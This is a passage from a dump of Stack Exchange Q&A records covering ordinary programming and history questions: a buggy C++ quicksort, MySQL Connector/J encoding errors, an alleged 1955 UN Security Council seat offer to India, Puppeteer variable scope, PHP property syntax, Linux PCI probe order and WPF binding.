possible approaches to resolving this.\n","meta":{"source":"civicrm.stackexchange","title":"Why does the html snippet for a profile not include the url of the site for linked Jscript and css files?","dup_signals":{}},"subset":"stackexchange"} +{"text":"quicksort not sorting c++\n\nQuestion: I am trying to write a quicksort function to sort anywhere between 10 and 1,000,000 numbers. It iterates through everything but does not sort, just prints the vector as is.\nFor some reason it jumps out of the <code>while<\/code> loop way too soon.\nThe test input I'm using is: (3 6 2 5 1 7 9 10 4 8). 
\nAnd it's output: (1 2 6 5 3 7 9 10 4 8)\n<code>int main()\n{\n std::cout << \"Which file would you like to sort?\\n\";\n std::cin >> file;\n\n std::ifstream in(file.c_str());\n\n \/\/ Read all the ints from in:\n std::copy(std::istream_iterator<int>(in), std::istream_iterator<int>(),\n std::back_inserter(numbers));\n\n int max = numbers.size();\n quickSort(numbers, 0, max-1);\n\n \/\/ Print the vector with tab separators:\n std::copy(numbers.begin(), numbers.end(),\n std::ostream_iterator<int>(std::cout, \"\\t\"));\n std::cout << std::endl;\n\n return 0;\n}\n\nvoid quickSort(vector<int> &numbers, int start, int end)\n{\n int i = start;\n int j = end;\n int pivot=numbers[start];\n int temp;\n while( i != j )\n {\n while( numbers[i] < pivot && i < j)\n i++;\n while( numbers[j] >= pivot && i < j)\n j--;\n\n temp = numbers[i];\n numbers[i] = numbers[j];\n numbers[j] = temp;\n\n if( j < start )\n {\n quickSort( numbers, start, j );\n }\n\n if( i < start )\n {\n quickSort( numbers, i, end);\n }\n }\n return;\n}\n<\/code>\nComment: When you step through the program in a debugger, at what point does the actual state of the program deviate from what you expect the state to be?\nComment: once it gets to `temp = numbers[i];` it sets it to '7' and I don't quite understand why.\nAnswer: This line looks out of place:\n<code>int pivot=numbers.size()\/2;\n<\/code>\nYou're picking for your pivot the middle element of the <code>numbers<\/code> vector regardless of the <code>start<\/code> and <code>end<\/code> positions.\nComment: Yep, should be 'int pivot = numbers[(start + end) \/ 2];'\nComment: For my purpose, I believe making the middle element be the pivot makes the most sense. If I were to replace what I have with `pivot = numbers[(start + end)\/2];` it would set the pivot to be the middle element anyway with my code.\nComment: @Fourthmeal70 No the regular pivot is end-1 for the regular quicksort.\nAnswer: Possibly among other things, you aren't actually looking at the contents of the vector when you move your indices to find a swap. This section:\n<code> while( i < pivot && i < j)\n i++;\n while( j >= pivot && i < j)\n j--;\n<\/code>\nshould be changed to this:\n<code> while( numbers[i] < pivot && i < j)\n i++;\n while( numbers[j] >= pivot && i < j)\n j--;\n<\/code>\nAs one of the commenters mentioned, the bigger lesson is to learn to use a good debugger to step through your code.\nSimilarly, you should be selecting pivot as an array value. E.g. <code>pivot = numbers[start]<\/code>\nComment: It atleast sorts a couple numbers now. But now I can't figure out why its not sorting them all. I updated my question with the input and output, as well as my updated code.\nComment: Even with the fixes, I think you still have a few problems. I can't recommend enough learning to use gdb or some other debugger. In particular, I think that the two recursive calls to quicksort should be outside of the while loop - you first want to do all of the swaps, and then recurse on the two halves of the list. Second, I don't understand why you have the `if (j < start)` before recursing. 
I suspect that you might want a different condition there.\n","meta":{"source":"stackoverflow","title":"quicksort not sorting c++","dup_signals":{}},"subset":"stackexchange"} +{"text":"Mysql connector\/j 8.0.29 causes incorrect string exception\n\nQuestion: I am having trouble inserting utf8 string into a mysql database using 'mysql connector\/j ver 8.0.29'\nI am working on a java springboot application.\nThis problem does not happen in 'mysql connector\/j ver 8.0.27'\nAnybody encounter this problem?\n\u2014-\nMysql server is also 8.0.29 but there is no problem since I can successfully execute 'INSERT' sql command using UTF-8 on the server itself\nIt is only when sending 'INSERT' sql command via client pc using springboot that this problem happen\nServer pc OS is windows10, client pc is Windows11\nThis is my table.\n\nThis is the error.\n<code>Caused by: java.sql.SQLException: Incorrect string value: '\\x95|\\x82\\xA2\\x98b' for column 'path' at row 1\n at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:129)\n at com.mysql.cj.jdbc.exceptions.SQLExceptionsMapping.translateException(SQLExceptionsMapping.java:122)\n\n<\/code>\n\nthis is the connection string:\nspring.datasource.url=jdbc:mysql:\/\/localhost\/${xpac.sql-database-name}?serverTimezone=Asia\/Tokyo\nthis is the error:\n<code>Caused by: java.sql.SQLException: Incorrect string value: '\\x95|\\x82\\xA2\\x98b' for column 'path' at row 1 at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:129)\n<\/code>\n\u6016\u3044\u8a71 ---> '\\x95|\\x82\\xA2\\x98b'\nComment: Show us the connection parameters. Verify that the encoding in the client is UTF-8.\nComment: I did not set character encoding in application.properties, it uses default, which is UTF-8\nComment: mysql connector\/j 8.0.29 has this change in its release https:\/\/dev.mysql.com\/doc\/relnotes\/mysql\/8.0\/en\/news-8-0-29.html#mysqld-8-0-29-charset\nComment: anybody encounter this problem?\nComment: \"UTF-8\" is not a MySQL Character Set. Please provide the exact text of the connection. To check the client encoding, can you display the HEX of what is about to be inserted.\nComment: this is the connection string:\n\nspring.datasource.url=jdbc:mysql:\/\/localhost\/${xpac.sql-database-name}?serverTimezone=Asia\/Tokyo\nComment: I edit my post and included information regarding connection string at the bottom\nComment: This problem happens when I upgraded mysql connection\/j version from 8.0.27 to 8.0.29\nComment: In mysql connection\/j version from 8.0.27, this problem does not happen\nComment: `dirpath` is in the error message; `path` is in the image.\nComment: its `path`....not `dirpath`\nComment: I tried to use the connection string `&useUnicode=yes&characterEncoding=UTF-8`...but the error still happens\nComment: I also tried to change server settings, `my.ini` ...default-character-set = utf8mb4, character-set-server = utf8mb4....but still the error happens\nComment: The server itself when I tried to insert string in the table, there is no problem...seems its the mysql connector\/j for ver 8.0.29 is causing the problem....\nComment: If possible, dump a string from Java in hex. 
(I agree that the minor upgrade should not have led to the error; I am trying to figure out what is wrong now, then work backward.)\nAnswer: Somewhere in the processing, either cp932 or sjis was used.\n'Proof' -- Using either <code>CHARACTER SET<\/code> <code>cp932<\/code> or <code>sjis<\/code> in\n<code>HEX(CONVERT('\u6016\u3044\u8a71' USING ...)) => '957C82A29862'\n<\/code>\nBased on your comments it seems to be caused by a change in Connector\/J\n(No, I don't know how to fix it; but this might help in chasing it down.)\nComment: thanks for this, server has `character_set_client`, `character_set_connection`, `character_set_results` as `cp932 ` which is the default..........when I changed it to `utf8mb4`, error still happens, may be I miss something here\nComment: Presumably, the bad setting was in effect when the data was inserted in the table. Do the SELECT suggested in https:\/\/stackoverflow.com\/questions\/38363566\/trouble-with-utf8-characters-what-i-see-is-not-what-i-stored to see what is in the table. I suspect you will get 957C...\nComment: this is what happened, when I save the value just in my pc(local), the value is `??????`....but when I saved it on server (remote PC),, SQLException `Incorrect String...` happens and data is not saved in the remote database\nComment: i have found the culprit, `path` is defined as LONGTEXT in database, in the java code it was annotated as `@Lob`, this is causing the problem....without the @Lob annotation, everything is working fine.....this only happens in mysql connector\/j ver 8.0.29\nComment: @jetpack - `TEXT` has a \"character set\"; violation of that can lead to '???; or other garbage. `BLOB` blindly takes the bytes.\nAnswer: Found the cause.\nThe java application itself when run as service uses the OS default character encoding. Which is obviously not UTF-8. This causes unexpected errors when the application is interacting with a database.\nWhen running the application, it is advisable to explicitly specify that it should use UTF-8. And this is done by specifying the java option <code>Dfile.encoding=utf-8<\/code>\nPerhaps in mysql ver 8.0.27, it forces data to be saved to use UTF-8.\nThen when it was updated to mysql ver 8.0.29 this was removed and you have to specify explicitly that you will use UTF-8 encoding.\n","meta":{"source":"stackoverflow","title":"Mysql connector\/j 8.0.29 causes incorrect string exception","dup_signals":{}},"subset":"stackexchange"} +{"text":"Did India turn down a permanent seat in the UN in 1955?\n\nQuestion: As per this article, India was offered a permanent seat on the UN Security Council in 1955 but Jawaharlal Nehru turned it down and the seat went to China. In light of the current lobbying that India is making for a permanent seat, what prompted Nehru to turn it down?\nUpdate: As per this news item, India did not receive any offer. So I believe the question becomes, who to believe, The Washington Post or The Hindu?\nComment: Note that Nehru was big on friendship with China (at least till 62), and this might have been a token of friendship.\nAnswer: From independent sources, I'd go with the India.com version: India never received any such offer.\nThe UN actually existed during WW2. This is what the group of countries allied against the Axis powers called themselves. The Security Council was the group of countries that were actually the major allies supplying large numbers of troops in the fight, and thus needed to periodically get together to coordinate grand strategic war plans. 
If you read Churchill's history of WWII, he mentioned that China was included in these meetings because they were actively fighting Japan (in a way, those two were the first belligerents of the war) and Roosevelt insisted they be included. I get the impression Churchill didn't share Roosevelt's view of the value of Chinese involvement. However, their relative feelings about France were essentially mirror images of this, so both France and China were put on as sort of a compromise.\nThis explains why votes from permanent members of the Security Council of the UN require unanimity. During the war, it would have been actively harmful to the UN alliance (which had to be maintained if they hoped to survive) for one group of members to engage in a major action the rest were dead set against. \nAfter the war, some of these countries became enemies with each other, so there was no way they'd agree to change the rules in a way that significantly lessened their own power. This is why this little club has never really changed, and the \"non-permanent\" members do not get vetoes. This is also why I highly doubt there ever was (or ever will be) any real offer to add India, or anybody else.\nIn short, permanent membership is not a statement of your country's value or size or anything. At this point its just a historical accident.\nComment: Personal note: I'm not advocating the status quo here, just explaining it. It would actually make a lot of sense IMHO to take the UK and French seats and just give them a single permanent \"EU\" seat, and then give India a permanent seat. However, I'm sure the UK and France would be horrified at this idea. Probably China would be too, for different reasons. So I highly doubt any such thing will ever happen.\nComment: Besides, for a series of reasons too long to be summarized in a comment, it is unlikely that India will ever have a place at the UN SC *before* settling all border disputes with China and (especially) with Pakistan.\nComment: Sorry, but this is alternative history. There was no security council and the United Nations Organization during WWII.\nComment: @Anixx There is nothing in this answer saying that *UN organisation* existed, though? \"The UN actually existed during WW2. This is what the group of countries allied against the Axis powers called themselves.\" - this is [correct](https:\/\/en.wikipedia.org\/wiki\/Declaration_by_United_Nations). On the other hand, might be good to change the wording to make it obvious that there was no body calling itself Security Council *at the time*.\nComment: Are you saying that the UN literally existed during WW II or are you referring to the [Combined Chiefs of Staff](http:\/\/en.wikipedia.org\/wiki\/Combined_Chiefs_of_Staff) by analogy? I am not (yet) aware of usages that equate the two terms.\nComment: There was the [Declaration by United Nations - Wikipedia](https:\/\/en.wikipedia.org\/wiki\/Declaration_by_United_Nations): *The Declaration by United Nations became the basis of the United Nations (UN), which was formalized in the UN Charter, signed by 50 countries on 26 June 1945.* See also: [Founding Members - UN Membership - Research Guides at United Nations Dag Hammarskj\u00f6ld Library](https:\/\/research.un.org\/en\/unmembers\/founders)\nAnswer: China had a permanent seat since 1945\n\nAs one of the \"Big Four\" allies in World War II (China, the Soviet Union, the United Kingdom, and the United States), the Republic of China (ROC) was one of the founding members of the United Nations. 
President Franklin Roosevelt had acknowledged China's war effort in World War II and stated his desire to allow China to \"play its proper role in maintaining peace and prosperity\" in the world, even though China was not socially influential or militarily strong1. Thus, despite opposition from other leaders, especially Winston Churchill, [3] China became a permanent member of the Security Council from its creation in 1945.\n\nHowever after the Chinese Civil War, China was represented by the Republic of China (Taiwan) in the UN until 1971. \nAs for India being offered a seat in the UN in 1955 - I don't know how true that is but there is another reference from 2008 mentioning the same thing. I'm not sure how trustworthy that reference is though. In addition the term \"offer\" is very vague - it could simply mean that the US indicated support for an Indian permanent membership. If the UN had formally agreed to let India in, it would have been very big news probably requiring a vote in the General Assembly. So it's pretty much impossible that India had the choice of taking a permanent seat in the council in 1955.\nIf the incident (in whatever form) did happen though, then Nehru probably meant that the People's Republic of China (mainland China) should be given permanent representation in the Security Council as part of an ongoing effort at that time to improve Indo-Chinese relations. \nComment: +1 For the distinction on China, THAT always gets confused by people as to the ROC and PRoC.\nComment: As another answer points out, [Nehru himself clarified in Parliament that no such offer was made](https:\/\/www.thehindu.com\/todays-paper\/tp-miscellaneous\/dated-september-28-1955-un-seat-nehru-clarifies\/article27479637.ece) - since your answer is the accepted one, please update it with this fact.\nAnswer: Late Prime Minister Nehru himself has explicitly stated in Parliament that India was not offered a permanent membership on the UN Security Council.\nNews item from \"The Hindu\" (dated September 28, 1955) -\nUN seat: Nehru clarifies:\n\nPrime Minister Nehru has categorically denied any offer, formal or informal, having been received about a seat for India in the UN Security Council. He made this statement in reply to a short notice question in the Lok Sabha on September 27 by Dr. J.N. Parekh whether India had refused a seat informally offered to her in the Security Council.\nThe Prime Minister said: \"There has been no offer, formal or informal, of this kind. Some vague references have appeared in the press about it which have no foundation in fact. The composition of the Security Council is prescribed by the UN Charter, according to which certain specified nations have permanent seats. No change or addition can be made to this without an amendment of the Charter. There is, therefore, no question of a seat being offered and India declining it. Our declared policy is to support the admission of all nations qualified for UN membership.\"\n","meta":{"source":"history.stackexchange","title":"Did India turn down a permanent seat in the UN in 1955?","dup_signals":{}},"subset":"stackexchange"} +{"text":"xml Element Tree : fail to get expected output\n\nQuestion: I am using xml.ElementTree to loop through a python list and write it to an xml file in a tree structure. Here is the following code and follows the desired output. 
Can any1 please help me!!\n<code>import xml.etree.ElementTree as ET\nsample = ['germany','India','USA','srilanka']\n\nroot = ET.Element(\"root\")\ndata = ET.SubElement(root, \"data\")\ntitle = ET.SubElement(data, \"country\")\nfor a in sample:\n title.text = a\n data.append('title')\n\ntree = ET.ElementTree(root)\ntree.write(\"page.xml\")\n<\/code>\nCurrent output\n<code>- <root>\n <data>\n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <\/data>\n <\/root>\n\nExpected output\n <root>\n <data>\n <country>germany<\/country> \n <country>india<\/country> \n <country>usa<\/country> \n <country>srilanka<\/country> \n <\/data>\n <\/root>\n<\/code>\nI need the output in this fashion...help me !!\nThanks in advance!\nAnswer: The problem is, that you append always the same element, which gets modified to reflect the final value. Note, that append works with a reference, not with a snapshot copy as you seem to expect. Easiest fix is, to create a new subelement instance for each country.\n","meta":{"source":"stackoverflow","title":"xml Element Tree : fail to get expected output","dup_signals":{}},"subset":"stackexchange"} +{"text":"Node require constant undefined inside function\n\nQuestion: I am working in Node (commonjs) and I have a <code>const<\/code> that I am grabbing with <code>require<\/code> and <code>module.exports<\/code> and it is coming through fine within one function but once I'm inside a function in the function, it is all of a sudden undefined.\nmain.js\n<code>const SRLoginCredentials = require('.\/secrets.js');\n\nconst puppeteer = require('puppeteer-extra');\n\n\/\/ Add stealth plugin and use defaults\nconst pluginStealth = require('puppeteer-extra-plugin-stealth');\nconst { executablePath } = require('puppeteer');\n\n\/\/ Use stealth\npuppeteer.use(pluginStealth());\n\n\/\/ Launch puppeteer-stealth\npuppeteer.launch({ headless: false, executablePath: executablePath() }).then(async (browser) => {\n \/\/ Create a new page\n const page = await browser.newPage();\n\n \/\/ Go to the website\n await page.goto('https:\/\/google.com');\n\n \/\/ Wait for security check\n await page.waitForTimeout(2000);\n\n await page.waitForSelector('#APjFqb');\n console.log(SRLoginCredentials); \/\/ SRLoginCredentials is defined\n \n await page.$eval('#email', (el) => (console.log(SRLoginCredentials)); \/\/ SRLoginCredentials is undefined\n\n await browser.close();\n});\n<\/code>\nsecrets.js\n<code>const SRLoginCredentials = {\n email: 'firstname.lastname@example.com',\n password: 'some_pass',\n};\n\nmodule.exports = SRLoginCredentials;\n<\/code>\npackage.json\n<code>\"type\": \"commonjs\",\n<\/code>\nAny insight into why that's happening would be much appreciated!\nComment: The function passed to eval is evaluated in the browser's context, so the node context isn't being captured as one would suppose. Pass what you need, like SRLoginCredentials, as additional params to eval. See https:\/\/stackoverflow.com\/a\/59899999\/294949.\nAnswer: @danh answered my question perfectly in a comment above!\n","meta":{"source":"stackoverflow","title":"Node require constant undefined inside function","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP private variable is 'undefined' though it is defined\n\nQuestion: I've been toying with a RuneScape hiscore image creator. People tend to use these for signatures on their profiles on forums.\nWhile reworking some of the code, I broke it. 
I'm getting:\n\nUndefined variable: exp in \/assets\/user.php on line 8\n Fatal error: Cannot access empty property in \/assets\/user.php on line 8\n\nHowever, the variable isn't even on line 8 (I assume that's something to do with it trimming white space).\nHere is my User.php file\n<code><?php\n\nclass User {\n\npublic static $names = [\"Overall\", \"Attack\", \"Defence\", \"Strength\", \"Hitpoints\", \"Ranged\", \"Prayer\", \"Magic\", \"Cooking\",\n\"Woodcutting\", \"Fletching\", \"Fishing\", \"Firemaking\", \"Crafting\", \"Smithing\", \"Mining\",\"Herblore\", \"Agility\", \"Thieving\", \"Slayer\",\n\"Farming\", \"Runecrafting\", \"Hunter\", \"Construction\", \"Summoning\",\"Dungeoneering\", \"Divination\", \"Invention\"];\n\nprivate $user;\nprivate $mySkills = [];\nprivate $exp = [];\n\npublic function __construct($result) {\n $array = explode(\",\", $result);\n $id = 0;\n $arrId = 1;\n while($arrId < count($result)) {\n $this->$mySkills[$id] = $array[$arrId++];\n $temp = explode(\" \", $array[$arrId++]);\n $this->$exp[$id++] = $array[0];\n }\n}\n\npublic function getTotalXp() {\n return $this->$exp[0];\n}\n\npublic function getLevel($skill) {\n global $names;\n for ($x = 0; $x <= count($names); $x++) {\n if(strcasecmp($skill, $names[$x]) == 0) {\n return $this->$mySkills[$x];\n }\n }\n return 0;\n}\n\npublic function getExp($skill) {\n global $names;\n for ($x = 0; $x <= count($names); $x++) {\n if(strcasecmp($skill, $names[$x]) == 0) {\n return $this->$exp[$x];\n }\n }\n return 0;\n}\n}\n?>\n<\/code>\nI was getting errors with the $names but that was because I wasn't using global $names in the functions.\nComment: `$this->$mySkills` and `$this->$exp` is a __wrong__ syntax\nComment: ...and write your object's properties as: `$this->mySkills`, `$this->exp`, and so on\nAnswer: You're using the wrong syntax.\nUse <code>$this->variableName<\/code> not <code>$this->$variableName<\/code>\ni.e. change <code>return $this->$exp[0];<\/code> to <code>return $this->exp[0];<\/code>\nComment: I'm now getting undefined index errors for index 0 for my array(s). Though they should be set in the constructor, what'd be a good way to see they're being set?\nComment: After you create an instance of the User class, use the getter methods to see if anything is set.\nComment: It's showing it's not set. How should I be setting the variables within the constructor so they work with the instance of the class? Right now the instance is: `$user = new User($result);`, and mySkills\/exp should be set in the constructor, but are not. I added `echo 'Setting ' . $id . ' to ' . $array[$arrId]` to the constructor and nothing is displaying on the page.\nComment: Did you change all of the wrong syntax? It's also wrong within the `while()` loop, not just the getter methods.\nComment: Yes, I've actually got it down to another error. The problem with it being set was the `count($result)` should have used `$array`. Now I'm getting \"A non well formed numeric value encountered\" because `$temp = explode(\" \", $array[$arrId++]);` isn't setting the temp[0] correctly. I used an echo to see what it's being set as, and it's taking both values, I.E: `447663457 35892` when it should only have `447663457`\nComment: I've finally fixed all the errors. 
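For anyone who hits the same thing later, the working constructor boils down to something like this (a trimmed-down sketch; it assumes each skill in the hiscores string comes through as rank, level, xp, which is what the original indexing expected):\n<code>public function __construct($result) {\n    \/\/ one split on commas and whitespace, instead of explode(\",\") plus a second explode()\n    $parts = preg_split('\/[,\\s]+\/', trim($result));\n    $id = 0;\n    \/\/ each skill contributes three tokens: rank, level, xp\n    for ($i = 0; $i + 2 < count($parts); $i += 3) {\n        $this->mySkills[$id] = $parts[$i + 1]; \/\/ level (note: ->mySkills, not ->$mySkills)\n        $this->exp[$id++] = $parts[$i + 2]; \/\/ xp\n    }\n}\n<\/code>\n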
Ended up using `preg_split` instead of explode.\n","meta":{"source":"stackoverflow","title":"PHP private variable is 'undefined' though it is defined","dup_signals":{}},"subset":"stackexchange"} +{"text":"Profile only works for logged in users\n\nQuestion: I Have created a membership directory and it works fine when I am logged in but as soon as i log out I get this message - \nThe requested Profile (gid=1) is disabled OR it is not configured to be used for 'Profile' listings in its Settings OR there is no Profile with that ID OR you do not have permission to access this profile. Please contact the site administrator if you need assistance.\ni am using Wordpress\nCan someone advise me of a fix :(\nThanks ... I am new to CiviCRM\nAnswer: https:\/\/docs.civicrm.org\/user\/en\/latest\/organising-your-data\/profiles\/ has all the details you should need:\n\nVisibility: If the Profile is being used for a searchable directory, set the Visibility of any fields you want to include on the search form to Public Pages or Public Pages and Listings. For fields that will be used on sign-up forms, set Visibility to User and User Admin only. This ensures that other visitors to the form can't view any data from the database. To use fields for Search Views, you must set Visibility to Public Pages or Public Pages and Listings. Choosing either of the Public Page options pops up two additional settings:\nComment: Many thanks for the prompt response ... I had already done that :( for the fields in the profile so its something else ... cheers\nComment: CMS permissions would be the only other thought then eg 'access all custom fields'?\nComment: oh, also you have said what settings you put on the Profile itself. I had perhaps wrongly assumed you were talking about the fields\n","meta":{"source":"civicrm.stackexchange","title":"Profile only works for logged in users","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are devices on pci bus always probed in the same order?\n\nQuestion: I have 2 wireless pci cards (same model, but can work under 2 different modes) on the bus. They share the same driver. What I want to do is to hack the driver like this: check the pci index, the first probed device (index 0) will be configured as mode A, the next one (index 1) will be configured as mode B.\nso I want to know if they are probed in the same order every time the system init.\nIf the probe order is random, is there any other way can do that?\n\nI tried this: plug the same card into difference slots, and check what I got under \/sys\/devices\/pci0000:00. the result are all the same. \nso the kernel know nothing about the physical slot at all? I was thinking maybe the kernel know which physical slot the card was mounted on. pity..\nAnswer: To answer: No, they are not in general.\nTo what you are trying to resolve: No need to do that since it's fixed in modern kernels Linux systems, The name of network interface is linked to the physical slot of the device. You will always have same names until you physically move the cards.\nCorrection. Initially I thought that this is provided by kernel. No, it's provided by user space helper, i.e. 
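For reference, the kind of hack I have in mind inside the driver's probe callback is roughly this (only a sketch; configure_mode_a\/b and the probe function name are made up):\n<code>#include <linux\/atomic.h>\n#include <linux\/pci.h>\n\nstatic atomic_t card_count = ATOMIC_INIT(0);\n\nstatic int mywifi_probe(struct pci_dev *pdev, const struct pci_device_id *id)\n{\n    \/\/ 0 for the first card the kernel probes, 1 for the second\n    int idx = atomic_inc_return(&card_count) - 1;\n\n    if (idx == 0)\n        configure_mode_a(pdev); \/\/ hypothetical helper: bring the card up in mode A\n    else\n        configure_mode_b(pdev); \/\/ hypothetical helper: bring the card up in mode B\n\n    return 0;\n}\n<\/code>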
udev.\n\nNames incorporating Firmware\/BIOS provided index numbers for on-board devices (example: eno1)\nNames incorporating Firmware\/BIOS provided PCI Express hotplug slot index numbers (example: ens1)\nNames incorporating physical\/geographical location of the connector of the hardware (example: enp2s0)\nNames incorporating the interfaces's MAC address (example: enx78e7d1ea46da)\nClassic, unpredictable kernel-native ethX naming (example: eth0)\n\nOrigin: https:\/\/www.freedesktop.org\/wiki\/Software\/systemd\/PredictableNetworkInterfaceNames\/\nExample:\n<code>% ip link list dev enp0s20u2c2\n42: enp0s20u2c2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000\n link\/ether 4a:06:8b:65:72:36 brd ff:ff:ff:ff:ff:ff\n% ls -l \/sys\/class\/net\/enp0s20u2c2\nlrwxrwxrwx 1 root root 0 Dec 23 14:59 \/sys\/class\/net\/enp0s20u2c2 -> ..\/..\/devices\/pci0000:00\/0000:00:14.0\/usb1\/1-2\/1-2:2.0\/net\/enp0s20u2c2\n<\/code>\nComment: yes. devA->wl0->Mode A. devB->wl1 ->Mode B. that's what I'm trying to do. but I don't understand \"it's fixed in modern kernels\". if their device idx (probed) are random, how could the kernel do the static mapping? I'm sure the 1st probed dev is named wl0, but the 1srt dev can be either devA or devB, right?\nComment: Because physically devices are connected to specific slots. I'm going to update the answer to show an example.\n","meta":{"source":"stackoverflow","title":"Are devices on pci bus always probed in the same order?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get TextBox Value in ViewModel\n\nQuestion: Anyone one please tell me with example ,how to get textbox value in View Model, My model property is already Binding with textbox with Mode Two Way\n\nThis is my view model functions, I want to add new record to my observable collection.\nC#\n<code>public void AddPerson()\n{\n \/\/ add new record\n}\n\nprivate Model.Person _PersonData;\npublic Model.Person PersonData\n{\n get {\n if(_PersonData==null)\n {\n _PersonData = new Person();\n }\n return _PersonData;\n }\n set\n {\n Setproperty(ref this._PersonData, value);\n }\n}\n<\/code>\nXAML\n<code><Controls:MetroWindow\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:Controls=\"clr-namespace:MahApps.Metro.Controls;assembly=MahApps.Metro\"\n xmlns:VM=\"clr-namespace:Demo.ViewModel\"\n xmlns:d=\"http:\/\/schemas.microsoft.com\/expression\/blend\/2008\" xmlns:mc=\"http:\/\/schemas.openxmlformats.org\/markup-compatibility\/2006\" xmlns:Model=\"clr-namespace:Demo.Model\" mc:Ignorable=\"d\" x:Class=\"Demo.MainWindow\"\n Title=\"MainWindow\" Height=\"438\" Width=\"664\"\n GlowBrush=\"{DynamicResource AccentColorBrush}\" \n WindowStartupLocation=\"CenterScreen\">\n<Controls:MetroWindow.Resources>\n <Model:Person x:Key=\"PersonDataSource\" d:IsDataSource=\"True\"\/>\n <VM:MainViewModel x:Key=\"MainViewModelDataSource\" d:IsDataSource=\"True\"\/>\n<\/Controls:MetroWindow.Resources>\n\n <Controls:MetroWindow.RightWindowCommands>\n <Controls:WindowCommands>\n <!--<Button Content=\"settings\" \/>-->\n <Button>\n <StackPanel Orientation=\"Horizontal\">\n <Rectangle Width=\"20\"\n Height=\"20\"\n Fill=\"{Binding Foreground, RelativeSource={RelativeSource AncestorType={x:Type Button}}}\">\n <Rectangle.OpacityMask>\n <VisualBrush Stretch=\"Fill\" Visual=\"{StaticResource appbar_futurama_fry}\" \/>\n <\/Rectangle.OpacityMask>\n <\/Rectangle>\n <TextBlock Margin=\"4 0 0 
0\"\n VerticalAlignment=\"Center\"\n Text=\"Karthik\" \/>\n <\/StackPanel>\n <\/Button>\n <\/Controls:WindowCommands>\n<\/Controls:MetroWindow.RightWindowCommands>\n\n<Grid DataContext=\"{Binding Source={StaticResource MainViewModelDataSource}}\">\n <Grid.Background>\n <LinearGradientBrush EndPoint=\"0.5,1\" StartPoint=\"0.5,0\">\n <GradientStop Color=\"#FFF3F3F3\" Offset=\"0\"\/>\n <GradientStop Color=\"#FFFBF9F9\" Offset=\"1\"\/>\n <GradientStop Color=\"#FFF7F6F6\" Offset=\"0.555\"\/>\n <\/LinearGradientBrush>\n <\/Grid.Background>\n <Border BorderThickness=\"3\" HorizontalAlignment=\"Left\" Height=\"388\" Margin=\"10,10,0,0\" VerticalAlignment=\"Top\" Width=\"636\" CornerRadius=\"3\">\n <Border.Background>\n <LinearGradientBrush EndPoint=\"0.168,0.166\" StartPoint=\"0.168,0.08\">\n <GradientStop Color=\"#FF39D5FF\" Offset=\"0\"\/>\n <GradientStop Color=\"White\"\/>\n <\/LinearGradientBrush>\n <\/Border.Background>\n <Label Content=\"Master Details\" Margin=\"10,1,502,352\" FontWeight=\"Bold\" Foreground=\"White\"\/>\n <\/Border>\n\n <Border BorderBrush=\"#FFC7C2C2\" BorderThickness=\"1\" HorizontalAlignment=\"Left\" Height=\"238\" Margin=\"21,100,0,0\" VerticalAlignment=\"Top\" Width=\"187\" CornerRadius=\"3\">\n <Border.Background>\n <LinearGradientBrush EndPoint=\"0.433,0.407\" StartPoint=\"0.435,0.134\">\n <GradientStop Color=\"#29c5ff\" Offset=\"0\"\/>\n <GradientStop Color=\"White\"\/>\n <\/LinearGradientBrush>\n <\/Border.Background>\n <\/Border>\n <Border BorderBrush=\"#FFC7C2C2\" BorderThickness=\"1\" HorizontalAlignment=\"Left\" Height=\"239\" Margin=\"227,100,0,0\" VerticalAlignment=\"Top\" Width=\"405\" CornerRadius=\"3\">\n <Border.Background>\n <LinearGradientBrush EndPoint=\"0.435,0.378\" StartPoint=\"0.435,0.134\">\n <GradientStop Color=\"#29c5ff\" Offset=\"0\"\/>\n <GradientStop Color=\"White\"\/>\n <\/LinearGradientBrush>\n <\/Border.Background>\n <Button Content=\"DELETE\" Margin=\"211,189,41,21\" Width=\"149\" Height=\"21\"\/>\n <\/Border>\n <Label Content=\"New\" HorizontalAlignment=\"Left\" Height=\"29\" Margin=\"37,103,0,0\" VerticalAlignment=\"Top\" Width=\"87\" Foreground=\"White\"\/>\n <Label Content=\"Update\" HorizontalAlignment=\"Left\" Height=\"25\" Margin=\"246,105,0,0\" VerticalAlignment=\"Top\" Width=\"98\" Foreground=\"White\"\/>\n <TextBox HorizontalAlignment=\"Left\" Height=\"25\" Margin=\"37,150,0,0\" TextWrapping=\"Wrap\" Text=\"{Binding Path=Name,Mode=TwoWay,UpdateSourceTrigger=PropertyChanged}\" VerticalAlignment=\"Top\" Width=\"149\" DataContext=\"{Binding Source={StaticResource PersonDataSource}}\"\/>\n <TextBox HorizontalAlignment=\"Left\" Height=\"19\" Margin=\"37,197,0,0\" TextWrapping=\"Wrap\" Text=\"{Binding Path=ID,Mode=TwoWay,UpdateSourceTrigger=PropertyChanged}\" VerticalAlignment=\"Top\" Width=\"149\" DataContext=\"{Binding Source={StaticResource PersonDataSource}}\"\/>\n <Button Content=\"Update\" HorizontalAlignment=\"Left\" Height=\"24\" Margin=\"37,291,0,0\" VerticalAlignment=\"Top\" Width=\"149\"\/>\n <Button Command=\"{Binding _addCommand}\" Content=\"edit\" HorizontalAlignment=\"Left\" Height=\"21\" Margin=\"272,291,0,0\" VerticalAlignment=\"Top\" Width=\"149\"\/>\n <ListView HorizontalAlignment=\"Left\" Height=\"120\" Margin=\"246,150,0,0\" VerticalAlignment=\"Top\" Width=\"366\" ItemsSource=\"{Binding MasterData}\">\n <ListView.View>\n <GridView>\n <GridViewColumn Header=\"Name\" Width=\"120\">\n <GridViewColumn.CellTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding Name}\" TextWrapping=\"Wrap\"\/> \n <\/DataTemplate> \n 
